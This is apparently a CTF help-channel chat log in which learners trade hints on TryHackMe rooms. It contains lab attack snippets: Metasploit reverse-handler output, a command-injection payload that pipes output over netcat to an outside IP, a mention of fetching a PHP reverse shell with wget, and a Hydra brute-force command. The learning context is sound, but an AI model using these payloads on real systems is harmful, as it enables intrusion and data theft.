kind of confusing question though to me at least

@stuck fractal thanks lol

[-] Handler failed to bind to <mypublic_ip>:4444:- -
[] Started reverse TCP handler on 0.0.0.0:4444
[] Retrieving session ID and CSRF token...
[] Finding CSRF token...
[] Uploading and deploying qfSElhAWa4t7XtO...
[] Uploading 6267 bytes as qfSElhAWa4t7XtO.war ...
[] Executing qfSElhAWa4t7XtO...
[] Executing /qfSElhAWa4t7XtO/qxkRCwy0TJWm55NUGvp7o23M.jsp...
[] Finding CSRF token...
[] Undeploying qfSElhAWa4t7XtO ...
[] Exploit completed, but no session was created.

how to fix this

while im trying to do metasploit on ToolRus room

@swift falcon Why do you have LHOST set to your public IP?

yes, i did

ohhh

ok

It needs to be your VPN IP

just realized it

thanks

runs perfectly, thanks @stuck fractal

i use vim all the time, and im confused about what the vim room task 2 question 2 is asking me
@visual tapir I hated that question and the answer is really really dumb

anyone have time for quick sanity check on Brainpan :)?

Sure what’s up

root@brainpan:/root# whoami
root
root@brainpan:/root# 

@oblique cliff managed to figure it out ^^forgot my nopsled

hmm, having some trouble with the Alfred box, I've tried several things to get into the Jenkins box, to no avail: bruteforcing is probably not going to work, tried with several potential usernames: bruce, and alfred (guessed from the server on port 80). Gobuster is no-go, there's nothing on 80, 8080 redirects everything to the login page. Metasploit doesn't seem to have anything that works, though having the version number would help narrow things down. ...and I am dumb, I hadn't tried the REALLY obvious user/password yet

login worked

what do you think is the "really obvious" user/password? why not give it a go? (rhetorical)

yeah I just did it

You know the box is Jenkins, maybe that can help you figure out the password (more so then just the username jenkins)

someone left the default superuser password 🙂

taking a while to sign in though, I might've accidentally ddosed the box

It's a windows box so can be a little bit sluggish - especially for stuff like first sign ins ^^

it's also Java so fair point

yuisss (:

good ol java

hey I use it every day at work...

it's alright when you're reasonably sane with it

Oh I didn't say anything bad there

you just interpreted it as so 😉

which confirms my point :PPP

cracks the whip

I think I'm just going to reset the box...

@steady stratus can you plz help me more if possible

well, thanks room for being a good rubber ducky 🦆 🙂

whee got a shell

room: HackBack2019
task: 4
question: 5
issue: The first flag recieved does not work, checked the writeups and it states the same flag.

Would be highly appreciated for any assistance!

@dark plover Jurassic part?

Please don't post flags.

Oh i am terribly sorry. Did not know

Yes that is correct,

Known issue.

and bingo root flag....that'll teach me to overthing this stuff

well played (:

so in a writeup, do you list everything you did, or are these things edited to show the shortest path?

more or less

A writeup should be a guide

But also explain

gotcha

at least IMO

took some notes on this one

is there a way to get the user/pass on the Alfred room without guessing?

or I suppose you're supposed to research defaults

I believe that one was defaults iirc

Hello someone in here did the injection challenge?

@ripe rock Don't ask to ask, just ask.

this question of almost the last task

Print out the MOTD. What favorite beverage is shown?

Did you print out the motd?

What it means print out the only thing i did was cat to it

That prints it to stdout

So yes

im on the learn linux room on task 43. im trying to access the /root directory. could someone point me twords the right direction

Never mind i figured it out

im doing madness from thm, and im on the stega part, ive notice the extension of the file is .jpg but on hex the header is png. ive tried changing and renaming it from both ends but still cant open the image, ive used binwalk, steghide, and stegextract but no luck

please enlighten me 😆

I would look more into the hex of the header you spotted and maybe look into magic numbers

i was able to solve it by replacing the file signature of png to the signature of jpg in its headers

yet im stuck again with this cypher y2RPJ4QaPF!B 😆

tried rot 13, 47 and caesar nothin seems to match

and as far i know, there is no hash that matches it

where'd you get that?

from the ctf's hidden directory

i was just left with this "Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B"

Room: Blue
When I upload my launcher from PS Empire and run it, it says
"Could Not Find C:%~f0"
Edit: I'll forward this to #room-help

Room Linux Challenges. Find flag12 where motd are stored. I've read the man page and tried the files where motd can be stored including /run, but no flag12. Hint?

Nm, got it. Note to self: remember grep's -i flag.

@ebon heron have you tried different combinations of bash operators?

@verbal wedge as || && and so on operators?

Indeed

Also keep in mind nc won't work

So you'll need to research some different ways of spawning shells

I gotten it to give me a shell for www-data

Well there ya go lol

but i suspect the last flag is in a certain folder

Indeed. The only flag :)

i am blind facepalm

Thanks @verbal wedge

Happens to the best of us

Aye

hi there, In the room Injection Task 3 Blind Injection, when we try to test the rediction, there is a issue, the directory /var/www/html hasn't write permissions, as intermediate user i can circubemnt this problem, but if the idea is to demostrate Blind Injection this dosen't work:

input field

||ls -la /var/www |nc 10.8.12.175 1234

kali

nc -lnvp 1234
listening on [any] 1234 ...
.
.
drwxr-xr-x  4 root root 4096 May 26 01:47 html

@white salmon It is still blind injection

You have code execution

You're choosing to redirect the output over the network via netcat

yeap, first thing i tried, according to the room desc, was to redirect, it was only an observation to facility test to other users i think, that dont know how to redirect to necat

You converted a blind RCE into regular RCE

That's all

It's still a blind RCE vuln

It asked you to redirect to a file

ok Sorry i always think as a teacher, and ways to make my students understand, hehe

this was a question from them, they tried to redirect and see the result directly on http:/ip/result.txt, thanks

@white salmon Interesting question, but as you can't write to the directory I don't think it'd work

@white salmon Interesting question, but as you can't write to the directory I don't think it'd work
@stuck fractal Precisely that was the suggestion, that /var/www/html, have write permissions for www-data, so that it would be easier to test it, but this works well, it does not matter, Maybe can be a suggestion to the room's author, thanks again

@white salmon I'm speaking to the author now, I think the directory was meant to be writeable by www-data

I managed to break the box in other ways

Yes I apologize for the confusion

The goal was to just demonstrate simple blind injection which I feel I've accomplished but I will make the www-data directory writable by www-data

As suggested

@verbal wedge thanks, this will make the room more educational, I think 🙂

Yeah no problem. Simple oversight by me

Glad you liked it

Opening up write perms will make room for uh... interesting things

like wget a full php rev shell

Easter 4 on ctfcollectionvol2
@white salmon
Did you have any luck in figuring this out. I tried a bunch of stuff with sqlmap, but I don't know it well at all.
I will probably get stuck on Easter 5 as is an SQL thing again.
That room maybe above me at the mo, but couldn't find an SQL learny room in tryhackme either

@odd nebula If you want to learn sql, I recommend sololearn

There's more SQLi content coming soon

I've had my fair share of issues with it.

I haven't worked on it much, because I couldn't figure out what to read from the table.

@stuck fractal thanks again. I'll look into it.
Before I look blindly, is sololearn a leaning site like THM or is it here

It's a programming learning platform

It's free, I personally think it's good

It's a programming learning platform
@stuck fractal
I'll go and see what I can find right now.
School school school haha

@stuck fractal looks interesting. I'll see what it brings.

I haven't worked on it much, because I couldn't figure out what to read from the table.
@white salmon
@NinjaJc01 recommended sololearn to me. I'll be looking there. It may help you too.

I saw.

Of course.

https://tryhackme.com/room/introtox8664 any hints on crackme2? :)

got the ||disk|| on mr Robot and ||got the strings from it into a file|| any hints what I should be looking for in it?

can have a hint on willow? i accessed the ||nfs export|| and found an ||rsa_keys file||
is that a rabbit hole?

It is not

Combine that with what you got on the webserver

ok
are the keys supposed to be slices into the string or something?

@trail badger Would you be able to give me a hint on the learn linux? I am overthinking it.

Read the hint -- I, uh, wrote a whole blog post on RSA encryption/decryption with numeric keys

ok

link?

Check the hint for the user flag

It's in there

ok

thanks

может быть @pearl sparrow

sorry i mean maybe

/m @trail badger hi

I was just talking to someone in russian

am i meant to bruteforce the ssh passphrase on willow?

@inland onyx or what?
i decrypted the rsa

and got the key

but it says it has a passphrase

and i am not able to bruteforce it with rockyou

Mhm. Bruteforce it

It'll work with rockyou

ok

i guess i was just using only part of rockyou

@bitter shadow Did you finish the challenge?

@bitter shadow I complete the challenge.

having trouble with room Steel Mountain

the CVE he ask for.. i look exploit-db but the answer incorrect?

the CVE he ask for.. i look exploit-db but the answer incorrect?
@shrewd verge solved.. no need CVE- includes in answer

Can someone help on TASK 4 ==> #5 flag1 text [Web Exploitation] [Medium] Jurassic Park in HACKBACK 2019 , i found the first flag text , but when i copy paste the flag, it shows wrong flag

@vernal ridge It's a known bug.

sorry i dint know tht still

so there is nothing i can do?

You could wait till Dark fixes it, or you could pm me and show me the incorrect flag and I'll send you the correct one.

i have the incorrect flag, i shall PM you

@ripe rock I went to sleep last night 😂

I am new can anyone give me a hint for king of the hill carnage?

@white quartz KOTH boxes are supposed to be rooted on your own. No one is going to help with that

okk

i asked not for a clue

only for a hint

only for a hint
@white quartz well i haven't rooted carnage yet either but i believe LFI/RCE is the right way to do it.

thanks

I have tried every thing.. I know.. php bash nc msf webscript

Help me .. anyone?

@tidal sedge buddy i need help on task 10 #3

port knocking is not working

A port scanner should wake it up. I know mine does.

i tried but the ssh is still filtered

i tried configuring the ip tables too, but couldnt open the SSH port

@tidal sedge can I DM about this buddy?

I'm obviously missing something with the XSS room getting Jack's cookie via stored XSS. I have a message posted with code that'll re-direct to my server, and I'm catching my own cookie when I refresh the page, but nothing from Jack.

can i have a hint about willow? i think i'm being very stupid, i'm on the last part
i just found root's password, but i have no idea how to go forward

login as root?

i did

and i checked root.txt

and it says ||This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!||

backtrack then

look back at everything you did

maybe something will be accessible now that wasn't earlier

ok

augh i feel stupid
idk how to go forward
i've gone back and looked at everything i did
nothing new

errrmmm i having problem with steel mountain room

What's up?

i did found the cve n it has on msf

but it doesnot work?

well i try to exec ping commands.. same issues

Need a bit more information than that. So you found the Metasploit exploit, and you input your settings. Did you ensure that you RHOST, RPORT, LHOST AND LPORT are correct?

Steel Mountain doesn't respond to pings if I remember correctly.

IIRC that exploit also has SRV parameters

Hey ther! Can someone help with 1 task i cant get through ? (Lean Linux task 43)

I just set RHOST and RPORT with LHOST and LPORT according to my notes Ninja.

Hello 🙂

We saw your question. If/when someone is available to help with that one they will Xaw. 🙂

ok thanks 🙂

Hi @surreal kite

what's your problem?

im trying to finish the Learn linux room and am stuck on the last task

only just figured out 2>>/dev/null is pushing all errors to null

but either way i need to access a file in /root/root.txt as other user

I'm not sure what was the process of getting root on this machine

but try

sudo -l

i found a file with nice name: .sudo_as_admin_successful but no idea what to do with it

I don't think that's relevant

oh wait, I think I remember

user shiba4 cant run sudo :/

Nope

But maybe you can gain access to a user that can

the only users i can see are shiba1 2 3 4 and nootnoot

but cant see password for nootnoot

try them one by one

and forget nootnoot

What

No

That's misleading

Don't mislead people that ask for hints

don't forget nootnoot

better?

cat /etc/passwd will show you all the users

are all those users even the news mail lp etc ?

i can see noot as a user as well

no, normally the last couple of users

ok thank you

They are all users.

and root being always at the top

They are not all users that you created.

no im still stuck

the only one i can log in to are shiba1 and shiba4

wait are you sure?

i know i did log into shiba 2 but dont remember the password for it

look back at the questions

maybe you submitted the password

ok

You can log in to all the shibas if you have reached task 43

it's task 21

yeah found it and logged in but still cant run sudo -l

and task 33

keep trying on all users

i dont think ive ever logged into shiba 3 or nootnoot or noot

You have logged into shiba3

yeah

did i ?

Yes

if you followed along, yes

in order to gain access to shiba4, you had to be shiba3

hmm ok

yeah i did all of that

let me check

you are right, shiba3:happynootnoises

but still no sudo luck

keep trying....

can i please get a hint ? 😄 im stuck on this for a while

Don't post the answers please @surreal kite

sorry!

Look for files on the system that belong to each and every user. Investigate suspicious ones

try using the find command

just a quick one, when i look for files through: find / -user shiba3 -type f 2>>/dev/null it shows lots of /proc/ files it wont be there will it ?

Can someone help on TASK 10 ==> #3 flag3 HACKBACK 2019 , i got 4 ports, and the SSH port is filtered, i tried to open the ssh port by knocking the 4 ports i found, but i couldnt open the ssh port, then i looked into the walkthough from @minor bough but it neither worked

probably not @surreal kite

can anyone give a hint on the final stage of CTF 100?

can i have a hint on getting the agent name for agent sudo?

I just set RHOST and RPORT with LHOST and LPORT according to my notes Ninja.
@patent token oooo.. i gain now ..;D

omg finally found it!! that was difficult lol 😄

thank you ❤️

w ||test||

any1 hints for task7 #3 RP: metasploit

Rikk.

Didn't you literally just finish #2?

i finish it

Please don't just jump from task to task asking for hints without putting the work in first.

rikk im going to just do you a favor and advise you to rule 13

i'm new i dont know where to put hands on

Google.

i dont even know wot a socks server is

Ok. We are happy to help those who help themselves. If you need assistance with learning to research, we can even try to help with that.

google it

If you don't know what a Socks4a server is, you can research that. It's a proxy server that allows you to connect through it to other machines, networks, etc. As for your Task7, #3 question, the answer is actually in the question itself.

https://tryhackme.com/room/introtoresearch

I also recommend doing that room if you haven't already, and if you have, heading back there for another peek.

so for this question "What is running on the higher port?" i nmap scanned udp for the ports and its asking for a 3 character answer ? can i get a hint

PORT STATE SERVICE
21/udp closed ftp
80/udp closed http
2222/udp closed msantipiracy

How did you setup the scan?

how did you specify ports? it shouldnt pull up those ports if theyre closed you should run a -p- instead

Why scan UDP?

@white salmon Please state the room, task and question number

I think I know the room, probably simple CTF

yes it was ^ and my bad

but i got it figured out

Usually helps to know where you are ;)

yeah oops haha

guys any hint regarding the_final_exam binary on radare2 room.i cant quite figure out what the getpw function does

@wanton shuttle try and figure out what a special function does ||get-password ||

@wanton shuttle try and input some simple strings to help with that

Hey all, currently enjoying the delights of CTF100 but all jammed up on flag75, anyone about to give me a little nudge with a hint?

@median compass you just need to search really really really hard. Then bang your head once you find it

lol @torn mural I really really really thought i had searched as hard as i could, i'll go search again and prepare for the head banging so, cheers!

@median compass if it helps, linpeas might reveal something, although, still well hidden

back to the grind so, thanks again!

hey stuck on learn linux task 33, mkdir test says permission denied. i see i don't have write access on the home directory but having trouble changing it if that's even what i'm supposed to do

That means you're in the wrong working directory

You haven't moved to your home directory

/home != your home directory @rotund skiff

alright found it hahah thanks

Hey I would love a hint for running Hydra in the ToolsRus room
I think I'm getting the syntax wrong somehow, first http-get-form was running but no hits, now its asking for http-get module, why idk..
hydra $IP -V -t 1 -l bob -P passwords.txt http-get "/protected:password=^PASS^:incorrect" -I

Why do you have password= for http basic auth?

dont need that eh

https://tylerrockwell.github.io/defeating-basic-auth-with-hydra/

wow this is so much faster

learn linux 43: i see a file in nootnoot, am i on the right track?

nevermnd file is empty

ooh got it

@rotund skiff you got it? I'm working on it now, and found the same file about half an hour ago. I can log in as noot, but have not figured out how to log in to nootnoot or whether I'm on on track or not.

@edgy cradle that file is not important. there is a file in one of the users that is important, you'll have to run a find command to find it. that file will give you more information

lmk if you need more info

OK thank you!